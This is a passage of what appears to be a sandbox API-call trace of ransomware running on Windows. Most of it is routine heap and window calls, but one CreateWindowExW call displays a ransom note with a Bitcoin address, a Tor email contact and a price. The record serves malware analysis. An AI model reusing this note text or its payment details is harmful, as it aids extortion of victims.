RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1b70 [0263.675] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c4d8 [0263.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86390 | out: hHeap=0xc60000) returned 1 [0263.675] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef19a0 [0263.675] CreateWindowExW (dwExStyle=0x200, lpClassName="edit", lpWindowName="The only way you can recover your files is to buy a decryption key, After you buy the required amount send the payment to 169M3wiaij1zucuASBXTT6egQuQJBckBrt , After you send the payment , please send your PC ID to this email: flyingship@mail2tor.com to get your decryption key\r\nPC ID: XDUWTFONOThe payment method is: Bitcoins. The price is: $200 = 0.02096076 Bitcoins\r\n\r\nClick on the 'Buy decryption key' button.", dwStyle=0x50000804, X=16, Y=456, nWidth=768, nHeight=177, hWndParent=0x80170, hMenu=0x8, hInstance=0x290000, lpParam=0x0) returned 0x5015e [0263.678] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.678] NtdllDialogWndProc_W () returned 0x0 [0263.678] GetStockObject (i=17) returned 0x18a0025 [0263.678] SendMessageW (hWnd=0x5015e, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0263.679] GetWindowTextLengthW (hWnd=0x5015e) returned 413 [0263.679] SendMessageW (hWnd=0x5015e, Msg=0xb1, wParam=0x19d, lParam=0x19d) returned 0x1 [0263.679] GetClientRect (in: hWnd=0x5015e, lpRect=0x91f870 | out: lpRect=0x91f870) returned 1 [0263.679] GetWindowRect (in: hWnd=0x5015e, lpRect=0x91f870 | out: lpRect=0x91f870) returned 1 [0263.679] SetWindowLongW (hWnd=0x5015e, nIndex=-21, dwNewLong=8) returned 0 [0263.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xede798 | out: hHeap=0xc60000) returned 1 [0263.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc38 | out: hHeap=0xc60000) returned 1 [0263.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838e0 | out: hHeap=0xc60000) returned 1 [0263.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eed0 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836b8 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe839b8 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837f0 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f0b0 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb1b0 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0eb0 | out: hHeap=0xc60000) returned 1 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb1b0 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7f0b0 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef0eb0 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837f0 [0263.680] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb200 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839b8 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19d0 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a90 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a90 | out: hHeap=0xc60000) returned 1 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836b8 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19d0 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19d0 [0263.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7eed0 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19d0 [0263.681] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe838e0 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19d0 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7f098 [0263.681] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b50 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef19d0 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83838 [0263.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a90 [0263.681] GetDC (hWnd=0x0) returned 0x270101c5 [0263.681] GetDeviceCaps (hdc=0x270101c5, index=90) returned 96 [0263.681] ReleaseDC (hWnd=0x0, hDC=0x270101c5) returned 1 [0263.681] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x840a01b1 [0263.681] SendMessageW (hWnd=0x5015e, Msg=0x30, wParam=0x840a01b1, lParam=0x1) returned 0x1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83838 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a90 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b50 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe839b8 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836b8 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eed0 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f098 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838e0 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb200 | out: hHeap=0xc60000) returned 1 [0263.691] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2eb8 | out: hHeap=0xc60000) returned 1 [0263.691] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb200 [0263.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe838e0 [0263.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19d0 [0263.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7158 [0263.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a90 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7158 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a90 | out: hHeap=0xc60000) returned 1 [0263.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19d0 | out: hHeap=0xc60000) returned 1 [0263.691] ShowWindow (hWnd=0x80170, nCmdShow=5) returned 0 [0263.691] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.692] NtdllDialogWndProc_W () returned 0x0 [0263.692] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.692] NtdllDialogWndProc_W () returned 0x0 [0263.706] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.706] NtdllDialogWndProc_W () returned 0x0 [0263.706] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.706] NtdllDialogWndProc_W () returned 0x0 [0263.706] NtdllDefWindowProc_W () returned 0x0 [0263.706] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.706] NtdllDialogWndProc_W () returned 0x1 [0263.713] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.713] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.713] NtdllDialogWndProc_W () returned 0x0 [0263.740] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.740] NtdllDialogWndProc_W () returned 0x0 [0263.741] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.741] NtdllDialogWndProc_W () returned 0x0 [0263.741] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.741] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.741] NtdllDialogWndProc_W () returned 0x0 [0263.742] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.742] NtdllDialogWndProc_W () returned 0x0 [0263.742] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.742] NtdllDialogWndProc_W () returned 0x0 [0263.743] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.743] NtdllDialogWndProc_W () returned 0x0 [0263.745] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.745] NtdllDialogWndProc_W () returned 0x1 [0263.745] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.745] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.745] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.745] SetBkColor (hdc=0x4c010712, color=0xf0f0f0) returned 0xffffff [0263.745] CreateSolidBrush (color=0xf0f0f0) returned 0x5910026a [0263.745] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83868 [0263.745] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83898 [0263.746] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.746] NtdllDialogWndProc_W () returned 0x0 [0263.747] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.747] NtdllDialogWndProc_W () returned 0x0 [0263.749] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.749] NtdllDialogWndProc_W () returned 0x0 [0263.750] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.750] NtdllDialogWndProc_W () returned 0x1 [0263.750] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.750] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.750] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.768] SetBkColor (hdc=0x4c010712, color=0xf0f0f0) returned 0xf0f0f0 [0263.768] GetForegroundWindow () returned 0x80170 [0263.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838e0 | out: hHeap=0xc60000) returned 1 [0263.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb200 | out: hHeap=0xc60000) returned 1 [0263.768] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.768] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.769] NtdllDialogWndProc_W () returned 0x0 [0263.769] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.769] NtdllDialogWndProc_W () returned 0x0 [0263.769] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.769] NtdllDialogWndProc_W () returned 0x0 [0263.769] TranslateMessage (lpMsg=0x91fd04) returned 0 [0263.769] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0263.769] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.769] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.769] GetWindowLongW (hWnd=0x80170, nIndex=-20) returned 256 [0263.769] NtdllDialogWndProc_W () returned 0x1 [0263.770] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.770] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.770] GetClientRect (in: hWnd=0x80170, lpRect=0x91fa50 | out: lpRect=0x91fa50) returned 1 [0263.770] GetCursorPos (in: lpPoint=0x91fa60 | out: lpPoint=0x91fa60*(x=799, y=511)) returned 1 [0263.770] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91fa60 | out: lpPoint=0x91fa60) returned 1 [0263.770] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0263.770] SetCursor (hCursor=0x10003) returned 0x10007 [0263.770] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.770] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.771] NtdllDialogWndProc_W () returned 0x0 [0263.771] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.771] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.771] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.771] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.771] BeginPaint (in: hWnd=0x80170, lpPaint=0x91f9f8 | out: lpPaint=0x91f9f8) returned 0x4c010712 [0263.771] EndPaint (hWnd=0x80170, lpPaint=0x91f9f8) returned 1 [0263.771] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.771] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] NtdllDialogWndProc_W () returned 0x1 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.772] SetBkColor (hdc=0x35010722, color=0xf0f0f0) returned 0xffffff [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] NtdllDialogWndProc_W () returned 0x0 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.772] SetBkColor (hdc=0x35010722, color=0xf0f0f0) returned 0xf0f0f0 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.772] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0263.772] NtdllDialogWndProc_W () returned 0x0 [0263.773] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.773] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.773] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0263.773] NtdllDialogWndProc_W () returned 0x0 [0263.773] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.773] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.773] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.773] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.773] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.773] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.774] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.774] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0263.774] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0263.774] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.774] NtdllDialogWndProc_W () returned 0x1 [0263.774] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.774] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.774] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.774] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0x0 [0263.775] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.775] NtdllDialogWndProc_W () returned 0x0 [0263.776] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.776] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.777] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.777] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.777] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.777] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0263.777] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0263.777] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.777] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.777] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.777] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.777] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.777] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0263.777] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0263.777] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.777] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.777] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.777] GetWindowLongW (hWnd=0x50166, nIndex=-21) returned 4 [0263.777] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.777] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0263.777] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0263.785] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.785] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.785] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.785] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.785] GetWindowLongW (hWnd=0xb0164, nIndex=-21) returned 5 [0263.785] GetWindowLongW (hWnd=0xb0164, nIndex=-21) returned 5 [0263.785] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.785] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0263.785] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xffffff [0263.788] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.788] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.788] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.788] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.788] GetWindowLongW (hWnd=0x600a2, nIndex=-21) returned 6 [0263.788] GetWindowLongW (hWnd=0x600a2, nIndex=-21) returned 6 [0263.788] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.788] GetWindowLongW (hWnd=0x600a2, nIndex=-16) returned 1342242944 [0263.788] GetSysColor (nIndex=5) returned 0xffffff [0263.788] GetSysColor (nIndex=8) returned 0x0 [0263.788] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0263.788] SetBkColor (hdc=0xd010720, color=0xffffff) returned 0xffffff [0263.788] CreateSolidBrush (color=0xffffff) returned 0x741006ef [0263.789] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe838e0 [0263.789] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe838b0 [0263.789] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.789] NtdllDialogWndProc_W () returned 0x1 [0263.789] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.789] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.789] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.789] SetBkColor (hdc=0x2e0101ce, color=0xf0f0f0) returned 0xffffff [0263.790] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.790] NtdllDialogWndProc_W () returned 0x0 [0263.790] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.791] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.791] GetWindowLongW (hWnd=0x600a2, nIndex=-21) returned 6 [0263.791] GetWindowLongW (hWnd=0x600a2, nIndex=-21) returned 6 [0263.791] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.791] GetWindowLongW (hWnd=0x600a2, nIndex=-16) returned 1342242944 [0263.791] GetSysColor (nIndex=5) returned 0xffffff [0263.791] GetSysColor (nIndex=8) returned 0x0 [0263.791] SetTextColor (hdc=0x2f0101ce, color=0x0) returned 0x0 [0263.791] SetBkColor (hdc=0x2f0101ce, color=0xffffff) returned 0xffffff [0263.794] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.794] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] NtdllDialogWndProc_W () returned 0x1 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.795] SetBkColor (hdc=0x300101ce, color=0xf0f0f0) returned 0xffffff [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] NtdllDialogWndProc_W () returned 0x0 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.795] SetBkColor (hdc=0x300101ce, color=0xf0f0f0) returned 0xf0f0f0 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.795] GetWindowLongW (hWnd=0x5010a, nIndex=-21) returned 7 [0263.795] NtdllDialogWndProc_W () returned 0x0 [0263.796] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.796] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.796] GetWindowLongW (hWnd=0x5010a, nIndex=-21) returned 7 [0263.796] NtdllDialogWndProc_W () returned 0x0 [0263.796] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.796] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.796] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.796] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.796] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.796] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.796] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.796] GetWindowLongW (hWnd=0x5015e, nIndex=-16) returned 1342179332 [0263.796] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.796] GetSysColor (nIndex=8) returned 0x0 [0263.796] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0263.796] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xffffff [0263.802] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.802] NtdllDialogWndProc_W () returned 0x1 [0263.802] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.802] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.802] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.802] SetBkColor (hdc=0x37010722, color=0xf0f0f0) returned 0xffffff [0263.802] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.802] NtdllDialogWndProc_W () returned 0x0 [0263.803] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.803] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.803] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.803] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.803] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.803] GetWindowLongW (hWnd=0x5015e, nIndex=-16) returned 1342179332 [0263.803] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.803] GetSysColor (nIndex=8) returned 0x0 [0263.803] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0263.804] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xffffff [0263.804] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.804] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.804] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.804] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.804] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.804] GetWindowLongW (hWnd=0x5015e, nIndex=-16) returned 1342179332 [0263.804] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.804] GetSysColor (nIndex=8) returned 0x0 [0263.804] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0263.804] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xf0f0f0 [0263.804] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.804] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.804] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.804] GetWindowLongW (hWnd=0x5015e, nIndex=-21) returned 8 [0263.804] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.804] GetWindowLongW (hWnd=0x5015e, nIndex=-16) returned 1342179332 [0263.804] GetSysColor 